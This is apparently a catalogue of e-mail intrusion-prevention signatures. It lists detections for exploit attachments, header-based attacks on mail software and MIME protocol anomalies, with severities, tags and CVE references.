E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
Description:
Back to top

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
Description:
Back to top

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
Description:
Back to top

E-Mail_BS-Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow

About this situation: Detects malicious URL files containing a crafted URL value
Context: E-Mail Body Stream
Severity: 2
Tags: Windows, x86, CVE2006, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
Description:
Back to top

E-Mail_BS-Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow

About this situation: Detects EMF images potentially exploiting MS09-006
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-03, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-247-3038
Vulnerability: Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Microsoft-Windows-Kodak-Image-Viewer-Code-Execution

About this situation: Detected an attempt to exploit buffer overflow vulnerability in Microsoft Windows
Context: E-Mail Body Stream
Severity: 7
Tags: Windows 2000 SP4, Windows 2003 SP1, Windows XP SP2, Windows 2003 SP2, Any Hardware, MS2007-10, CVE2007, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-155-2032
Vulnerability: Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
Description:
Back to top

E-Mail_BS-Microsoft-Windows-Shell-MSHTA-Script-Execution

About this situation: Detects crafted OLE Compound files that allow script code execution in Windows
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, MS2005-04, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-Windows-Shell-MSHTA-Script-Execution
Description:
Back to top

E-Mail_BS-Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903

About this situation: A malicious Word document targeting CVE-2010-1903 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-329-4219
Last changed: sgpkg-ips-329-4219
Vulnerability: Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
Description:
Back to top

E-Mail_BS-Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902

About this situation: A malicious RTF document targeting CVE-2010-1902 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-328-4219
Vulnerability: Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
Description:
Back to top

E-Mail_BS-Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901

About this situation: A malicious RTF document targeting CVE-2010-1901 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-328-4219
Vulnerability: Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
Description:
Back to top

E-Mail_BS-Microsoft-Word-Section-Table-Array-Buffer-Overflow

About this situation: Malicious Word document detected
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Microsoft Word, MS2007-02, CVE2007, Windows not specific, Microsoft Word not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-155-2032
Vulnerability: HTTP-Microsoft-Word-Section-Table-Array-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Mozilla-Command-Line-Url-Command-Execution

About this situation: Detects URLs that exploit Mozilla browser start-up script to execute shell commands
Context: E-Mail Body Stream
Severity: 7
Tags: HP-UX, Linux, Any Hardware, Mozilla based browsers, CVE2005, HP-UX not specific, Linux not specific, Mozilla based browsers not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-Command-Line-Url-Command-Execution
Description:
Back to top

E-Mail_BS-Mozilla-Thunderbird-Iframe-JavaScript-Execution

About this situation: Detects Mozilla Thunderbird iframe JavaScript execution exploits
Context: E-Mail Body Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Thunderbird, CVE2006, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-354-4219
Vulnerability: Generic-Mozilla-Thunderbird-Iframe-JavaScript-Execution
Description:
Back to top

E-Mail_BS-OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow

About this situation: Malicious EMF file detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-155-2032
Vulnerability: OpenOffice-EMF-File-EMR_BITBLT-Record-Integer-Overflow
Description:
Back to top

E-Mail_BS-PNG-Image-With-Large-Data-Length-Value

About this situation: PNG image with large data length value in image chunk
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, MS2005-06, MS2006-06, CVE2005, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-69-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-Internet-Explorer-PNG-Image-Rendering-Buffer-Overflow
Microsoft-Windows-Media-Player-PNG-Image-Parsing-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: E-Mail Body Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-377-4219
Vulnerability: Generic-Shared-Variables
Description:
Back to top

E-Mail_BS-Suspicious-Author-Field-In-Microsoft-OLE-Compound-File

About this situation: Suspicious Author field in Microsoft OLE compound file
Context: E-Mail Body Stream
Severity: 7
Tags: Windows 98, Windows 98 SE, Windows ME, Windows 2000 SP3, Windows 2000 SP4, x86, MS2005-05, CVE2005, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Explorer-Web-View-Script-Execution
Description:
Back to top

E-Mail_BS-Suspicious-ICC-Profile-In-JPEG-File

About this situation: Suspicious ICC profile in JPEG file. Possible exploit against vulnerability in Microsoft Color Management Module
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, MS2005-07, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-925-5242
Vulnerability: Microsoft-Color-Management-Module-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Windows-Media-Player-ASF-CVE-2009-2527

About this situation: Malicious ASF file detected as an email-attachment.
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Microsoft-Windows-Media-Player-Code-Execution-MS09-052
Description:
Back to top

E-Mail_BS-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow

About this situation: Exploit against Windows Media Player via malformed BMP header (MS06-005)
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Windows Media Player, MS2006-02, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-59-1210
Last changed: sgpkg-ips-194-2032
Vulnerability: BMP-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818

About this situation: A malicious ASF file targeting CVE-2010-0818 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2010-09, CVE2010, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-340-4219
Vulnerability: Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
Description:
Back to top

E-Mail_BS-Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525

About this situation: A malicious ASF file targeting CVE-2009-2525 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
Description:
Back to top

E-Mail_BS-Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555

About this situation: A malicious ASF file targeting CVE-2009-0555 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
Description:
Back to top

E-Mail_BS-WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution

About this situation: Detects malicious Metasploit-made WMF files
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, MS2006-01, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-52-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
Description:
Back to top

E-Mail_BS-WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution

About this situation: Detects malicious WMF files
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, MS2006-01, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-51-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
Description:
Back to top

E-Mail_BS-Zip-Archive-Transfer

About this situation: Detected a transfer attempt of a zip archive
Context: E-Mail Body Stream
Severity: 2
Tags: Any Operating System, Any Hardware, WinZip, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Zip-Archive
File-Type-Identification
Description:
Back to top

E-Mail_Compressed-TNEF-RTF-Memory-Corruption

About this situation: Detected a potential Outlook exploit
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2010-09, CVE2010, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-339-4219
Last changed: sgpkg-ips-339-4219
Vulnerability: Microsoft-Exchange-Outlook-Compressed-RTF-Parsing-Memory-Corruption
Description:
Back to top

E-Mail_Content-Transfer-Encoding-Duplicate

About this situation: E-mail message had more than one Content-Transfer-Encoding header field
Context: E-mail without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: The E-mail message had two or more Content-Transfer-Encoding header fields. This can be caused by a sender that does not follow the E-mail message structure specifications, or this may be an evasion attempt (different implementations handle conflicting Content-Transfer-Encoding fields differently). As such, this situation is probably not very severe. However, this may affect further checks for the E-mail message, because the message structure is unclear. If anti-virus functionality is enabled for this connection, the message is normalized so that it only contains the first valid Content-Transfer-Encoding header field.
Back to top

E-Mail_Content-Transfer-Encoding-Unknown

About this situation: E-mail message uses unknown Content-Transfer-Encoding
Context: E-mail without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: The E-mail message uses Content-Transfer-Encoding that is not part of [RFC2045]. This can be caused by a sender that does not follow the E-mail message structure specifications, uses a local extension, or this may be an evasion attempt by encoding the message in a way that is not generally supported. As such, this situation is probably not very severe. However, this may affect further checks for the E-mail message, because the message content cannot be decoded.
Back to top

E-Mail_Content-Type-Duplicate

About this situation: E-mail message had more than one Content-Type header field
Context: E-mail without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: The E-mail message had two or more Content-Type header fields. This can be caused by a sender that does not follow the E-mail message structure specifications, or this may be an evasion attempt (different implementations handle conflicting Content-Type fields differently). As such, this situation is probably not very severe. However, this may affect further checks for the E-mail message, because the message structure is unclear. If anti-virus functionality is enabled for this connection, the message is normalized so that it only contains the first valid Content-Type header field.
Back to top

E-Mail_Content-Type-Invalid

About this situation: E-mail message had invalid Content-Type header field
Context: E-mail without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-454-4333
Description: The E-mail message had invalid Content-Type header field. This can be caused by a sender that does not follow the E-mail message structure specifications, or this may be an evasion attempt (different implementations handle conflicting Content-Type fields differently). As such, this situation is probably not very severe. However, this may affect further checks for the E-mail message, because the message structure is unclear. If anti-virus functionality is enabled for this connection, the message is normalized so that invalid Content-Type header fields are removed.
Back to top

E-Mail_Encoding-Multipart-Invalid

About this situation: Invalid transfer encoding for multipart e-mail message detected
Context: E-mail without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Invalid transfer encoding for a multipart e-mail message was detected. Quoted-printable or base64 encoding cannot be used to encode a multipart message. The top-level structure of the message will be handled as with text/plain encoding. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_Encoding-RFC822-Invalid

About this situation: Invalid transfer encoding detected for message/rfc822 content type in e-mail message
Context: E-mail without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Invalid transfer encoding was detected for the message/rfc822 content type in an e-mail message. Quoted-printable or base64 encoding cannot be used to encode message/rfc822 types of messages. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_Exim-Filename-Header-Misparsing-CVE-2024-39929

About this situation: An attempt to exploit a vulnerability in Exim detected
Context: E-Mail Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Exim, CVE2024, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1767-5242
Vulnerability: Exim-Filename-Header-Misparsing-CVE-2024-39929
Description: CVE References: CVE-2024-39929
Back to top

E-Mail_HCS-Bash-Shellshock-Code-Injection

About this situation: An attempt to exploit a vulnerability in bash detected
Context: E-Mail Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

E-Mail_HCS-BitDefender-AntiVirus-Logging-Function-Format-String

About this situation: Detects BitDefender AntiVirus Logging Function Format String Exploits
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, x86, BitDefender, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-360-4219
Vulnerability: SMTP-BitDefender-AntiVirus-Logging-Function-Format-String
Description:
Back to top

E-Mail_HCS-Elm-Expires-Header-Field-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in Elm's expires header field parsing
Context: E-Mail Header Stream
Severity: 7
Tags: Unix, Any Hardware, ELM, CVE2005, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-360-4219
Vulnerability: Elm-Expires-Header-Field-Buffer-Overflow
Description:
Back to top

E-Mail_HCS-Mail-From-Format-String

About this situation: Format strings in Mail From Header
Context: E-Mail Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Metamail, CVE2004, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Metamail-Format-String-Vulnerabilities
Description:
Back to top

E-Mail_HCS-Mail-Hdr-Sendmail-Header-BOF

About this situation: Sendmail Mail Header Buffer Overflow
Context: E-Mail Header Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sendmail, CVE2002, Any Operating System not specific, Sendmail not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Sendmail-Header-BOF
Description:
Back to top

E-Mail_HCS-Mail-To-Format-String

About this situation: Format strings in Mail To Header
Context: E-Mail Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Metamail, CVE2004, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Metamail-Format-String-Vulnerabilities
Description:
Back to top

E-Mail_HCS-MailEnable-SMTP-Mailto-Format-String

About this situation: Attempt to exploit a format string vulnerability in MailEnable
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, x86, MailEnable, CVE2004, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: MailEnable-SMTP-Mailto-Format-String
Description:
Back to top

E-Mail_HCS-Malformed-Date-Header-Field

About this situation: Detects malformed Date header fields
Context: E-Mail Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic SMTP server, CVE2005, Any Operating System not specific, Generic SMTP server not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Mailman-Bad-Date-Data-Denial-Of-Service
Description:
Back to top

E-Mail_HCS-Malformed-Utf8-Encoded-Attachment-Filename

About this situation: Detects malformed utf-8 encoded attachment filenames
Context: E-Mail Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mailman, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-Mailman-Utf8-Encoded-Attachment-Filename-Denial-Of-Service
Description:
Back to top

E-Mail_HCS-MDaemon-Content-Filter-Directory-Traversal

About this situation: Detects directory traversal exploits against MDaemon content filter
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, x86, MDaemon, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-360-4219
Vulnerability: SMTP-MDaemon-Content-Filter-Directory-Traversal
Description:
Back to top

E-Mail_HCS-Microsoft-Collaboration-Data-Objects-BOF

About this situation: Long message headers detected, possible MS05-048 exploit
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, x86, Microsoft Collaboration Data Objects, MS2005-10, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-42-1210
Last changed: sgpkg-ips-426-4219
Vulnerability: SMTP-Microsoft-Collaboration-Data-Objects-BOF
Description:
Back to top

E-Mail_HCS-Microsoft-Exchange-And-Outlook-TNEF-Encoding

About this situation: Detects usage of TNEF encoding in SMTP
Context: E-Mail Header Stream
Severity: 2
Tags: Windows, x86, Exchange Server 2000, Microsoft Outlook, Exchange Server 5.5, Exchange Server 5.0, MS2006-01, CVE2006, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-54-1210
Last changed: sgpkg-ips-188-2032
Vulnerability: Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow
Description:
Back to top

E-Mail_HCS-Novell-Groupwise-Internet-Agent-Content-Type-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Groupwise detected
Context: E-Mail Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-442-4219
Vulnerability: Novell-Groupwise-Internet-Agent-Content-Type-Buffer-Overflow
Description:
Back to top

E-Mail_HCS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: E-Mail Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

E-Mail_HCS-Sophos-Anti-Virus-Reserved-Device-Name-Handling

About this situation: An attempt to exploit a vulnerability in Sophos Anti-Virus detected
Context: E-Mail Header Stream
Severity: 7
Tags: Windows, Any Hardware, Sophos Anti-Virus, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-492-5211
Vulnerability: Sophos-Anti-Virus-Reserved-Device-Name-Handling
Description:
Back to top

E-Mail_HCS-SpamAssassin-Long-Message-Header-DoS

About this situation: An attempt to exploit a vulnerability in SpamAssassin detected
Context: E-Mail Header Stream
Severity: 7
Tags: Unix, Any Hardware, SpamAssassin, CVE2005, Unix not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: SpamAssassin-Long-Message-Header-DoS
Description:
Back to top

E-Mail_HCS-SpamAssassin-Malformed-Email-Header-DoS

About this situation: Detects denial of service attacks against SpamAssasin
Context: E-Mail Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SpamAssassin, CVE2005, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-SpamAssassin-Malformed-Email-Header-DoS
Description:
Back to top

E-Mail_HCS-SquirrelMail-Content-Type-Header-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in SquirrelMail detected
Context: E-Mail Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SquirrelMail, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SMTP-SquirrelMail-Content-Type-Header-Cross-Site-Scripting
Description:
Back to top

E-Mail_IMF-Base64-Length-Inconsistency

About this situation: Length of base64 encoded part in e-mail message was incorrect
Context: E-mail without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The length of the base64 encoded part in an e-mail message was incorrect. The decoding of the message varies between implementations if the padding at the end of the encoded part is incorrect. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_IMF-Boundary-String-Invalid

About this situation: Invalid MIME multipart boundary string detected
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An invalid MIME multipart boundary string was detected. The MIME multipart boundary string does not conform to [RFC 2046]. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_IMF-MIME-Parameter-Syntax-Incorrect

About this situation: MIME parameter used incorrect syntax in e-mail message header
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: A MIME parameter used incorrect syntax in an e-mail message header. MIME parameter value encoding violated the specification [RFC 2231]. The e-mail inspection module checks only the "boundary" parameter in the Content-Type header field of a MIME multipart message. Risk analysis: Risk level is fairly low. The e-mail inspection module does not have a valid value for the specified MIME parameter, which may affect further analysis.
Back to top

E-Mail_IMF-Multipart-Delimiter-Use-Invalid

About this situation: Multipart e-mail message contained invalid characters on line after boundary string
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A multipart e-mail message contained invalid characters on the line after the boundary string. These types of lines should not appear in a multipart message. It is uncertain whether this line actually marks a border between two parts or not. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_IMF-Quoted-Printable-Hexadecimal-Charater-Lowercase

About this situation: Lowercase hexadecimal character detected in quoted-printable encoded e-mail message
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A lowercase hexadecimal character was detected in a quoted-printable encoded e-mail message. Quoted-printable encoding [RFC 2045] specifies that only uppercase letters A to F in addition to digits 0 to 9 are used in the hexadecimal notation of an octet. The SMTP inspection module converts lowercase letters to upper case before decoding. Some applications may handle the faulty octet differently. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_IMF-Quoted-Printable-Whitespace-After-EqualL

About this situation: Whitespace character detected after equal (=) sign in quoted-printable e-mail message
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A whitespace character was detected after the equal (=) sign in a quoted-printable e-mail message. The encoding does not follow the specification [RFC 2045]. It is uncertain how the recipient e-mail application will decode the message. Risk analysis: Risk level is fairly low.
Back to top

E-Mail_IMF-Too-Long-Header

About this situation: An e-mail message header length exceeded the defined limit.
Context: E-Mail Header Length Limit
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
